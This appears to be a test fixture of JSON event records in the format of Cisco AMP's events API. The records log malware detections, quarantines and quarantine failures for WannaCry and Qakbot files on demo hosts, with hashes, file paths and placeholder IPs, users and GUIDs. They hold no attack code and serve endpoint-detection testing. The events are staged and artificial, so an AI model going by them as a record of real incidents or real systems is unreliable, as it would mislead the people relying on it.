-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526295","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526294","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526293","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526292","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526291","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526288","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526287","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303569945526286","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558988","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558989","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558987","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558986","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558985","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419303565650558984","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":461000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.2CA2D550E6-100.SBX.VIOC","detection_id":"6419303574240493599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskse.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskse.exe","identity":{"sha256":"2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":430000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.4A468603FD.04426d77.auto.Talos","detection_id":"6419303574240493597","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"taskdl.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\taskdl.exe","identity":{"sha256":"4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":327000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":313000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419303574240493594","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":2920,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419303574240493595","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419303574240494000,"timestamp":1610652551,"timestamp_nanoseconds":664000000,"date":"2021-01-14T19:29:11+00:00","event_type":"Threat 